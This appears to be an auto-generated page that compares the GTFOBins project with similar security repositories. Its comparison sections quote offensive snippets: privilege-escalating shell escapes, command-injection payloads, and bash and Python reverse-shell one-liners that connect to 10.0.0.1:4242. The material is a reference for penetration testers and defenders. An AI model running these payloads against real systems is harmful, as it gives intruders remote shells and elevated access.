GTFOBins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Top Related Projects
🎯 Command Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Quick Overview
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions in misconfigured systems. It serves as a valuable resource for both security professionals and system administrators to understand potential vulnerabilities and improve system security. The project is maintained as a GitHub repository with a dedicated website for easy access and navigation.
Pros
- Comprehensive collection of Unix binaries and their potential security implications
- Regularly updated with community contributions
- Well-organized and easy to navigate
- Provides practical examples for each binary
Cons
- Could potentially be misused by malicious actors
- Requires careful interpretation and understanding of the context
- May not cover all possible exploitation scenarios
- Some examples might become outdated as systems and software evolve
Getting Started
As GTFOBins is not a code library but rather a reference resource, there's no code to install or run. To use GTFOBins:
- Visit the official website: https://gtfobins.github.io/
- Use the search function to find specific binaries
- Read the provided information and examples for each binary
- Apply the knowledge to improve system security or conduct authorized penetration testing
For contributors:
- Fork the GitHub repository: https://github.com/GTFOBins/GTFOBins.github.io
- Add or modify binary entries following the project's guidelines
- Submit a pull request for review
Remember to use this information responsibly and only on systems you own or have explicit permission to test.
Competitor Comparisons
🎯 Command Injection Payload List
Pros of command-injection-payload-list
- Focused specifically on command injection payloads, providing a comprehensive list for this attack vector
- Includes payloads for various operating systems and scenarios, making it versatile for different environments
- Regularly updated with new payloads and techniques
Cons of command-injection-payload-list
- Less structured and categorized compared to GTFOBins, making it potentially harder to navigate
- Lacks detailed explanations or context for each payload, which may be less helpful for beginners
- Does not provide information on binary exploitation or privilege escalation techniques
Code Comparison
GTFOBins (YAML format):
---
functions:
shell:
- code: ash -p
command:
- code: ash -c 'command'
sudo:
- code: sudo ash -p
command-injection-payload-list (Plain text format):
;netstat -a;
|netstat -a|
`netstat -a`
$(netstat -a)
Both repositories provide valuable resources for security professionals and penetration testers. GTFOBins offers a more structured approach with detailed information on binary exploitation, while command-injection-payload-list focuses specifically on command injection techniques with a wide range of payloads.
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
Pros of PayloadsAllTheThings
- Broader scope covering various security topics beyond just binaries
- More extensive and detailed content with examples and explanations
- Regularly updated with contributions from a larger community
Cons of PayloadsAllTheThings
- Less focused, making it harder to find specific information quickly
- May be overwhelming for beginners due to the sheer amount of content
- Not as easily searchable or filterable as GTFOBins
Code Comparison
GTFOBins (YAML format):
---
functions:
shell:
- code: ash -p
file-read:
- code: ash -c 'echo "$(<file)"'
PayloadsAllTheThings (Markdown format):
## Reverse Shell
### Bash TCP
```bash
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Both repositories provide valuable information for security professionals, but they serve different purposes. GTFOBins focuses specifically on Unix binaries that can be exploited, while PayloadsAllTheThings covers a wider range of security topics and payloads.
PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
Pros of PEASS-ng
- Comprehensive suite of privilege escalation tools for multiple platforms
- Actively maintained with frequent updates and improvements
- Includes both automated scripts and manual techniques for thorough assessments
Cons of PEASS-ng
- Larger codebase and more complex to use compared to GTFOBins
- May require more setup and configuration for specific environments
- Potentially overwhelming for beginners due to its extensive feature set
Code Comparison
PEASS-ng (linpeas.sh):
if [ "$MACPEAS" ]; then
print_title "MacPEAS - macOS local Privilege Escalation Auditing Script"
else
print_title "LinPEAS - Linux local Privilege Escalation Auditing Script"
fi
GTFOBins (example from _layouts/bin.html):
{% if include.function %}
<h2 class="function-name" id="{{ include.function | slugify }}">{{include.function}}</h2>
{% endif %}
The code snippets demonstrate the different focus of each project. PEASS-ng is a comprehensive script for privilege escalation auditing, while GTFOBins provides a curated list of binaries that can be exploited for privilege escalation.
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
Pros of SecLists
- Broader scope: Covers various security testing aspects beyond just Unix binaries
- Larger collection: Contains numerous wordlists, payloads, and resources for different security scenarios
- Regular updates: Frequently maintained with contributions from the community
Cons of SecLists
- Less focused: Not specialized in a single area like GTFOBins
- Potentially overwhelming: Large repository size may make it harder to find specific information quickly
- Requires more context: Users need to understand how to apply the lists in different scenarios
Code Comparison
While a direct code comparison isn't applicable due to the different nature of these repositories, we can compare their structure:
GTFOBins:
---
functions:
shell:
- code: COMMAND
file-read:
- code: COMMAND
SecLists:
/Passwords
/Usernames
/Fuzzing
/Discovery
GTFOBins focuses on YAML files describing binary exploits, while SecLists organizes various text files into categorized directories.
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Pros of Red-Teaming-Toolkit
- Broader scope covering various red teaming techniques and tools
- Organized by categories, making it easier to find specific types of tools
- Includes links to external resources and tutorials
Cons of Red-Teaming-Toolkit
- Less frequently updated compared to GTFOBins
- Not as focused on specific binary exploitation techniques
- Lacks detailed explanations for each tool or technique
Code Comparison
GTFOBins (YAML format):
---
functions:
shell:
- code: COMMAND='id' ftp -e '! $COMMAND'
file-upload:
- description: Send local file to a FTP server.
code: ftp -v -n $RHOST <<EOF
Red-Teaming-Toolkit (Markdown format):
## Reconnaissance
* [AQUATONE](https://github.com/michenriksen/aquatone) - A Tool for Domain Flyovers
* [Nmap](https://github.com/nmap/nmap) - The Network Mapper
GTFOBins focuses on providing specific code snippets for exploiting binaries, while Red-Teaming-Toolkit primarily lists tools and resources without detailed code examples. GTFOBins uses YAML for structured data, whereas Red-Teaming-Toolkit uses Markdown for simple formatting and organization.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
GTFOBins
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
Find the project at https://gtfobins.github.io
Top Related Projects
🎯 Command Injection Payload List
A list of useful payloads and bypass for Web Application Security and Pentest/CTF
PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot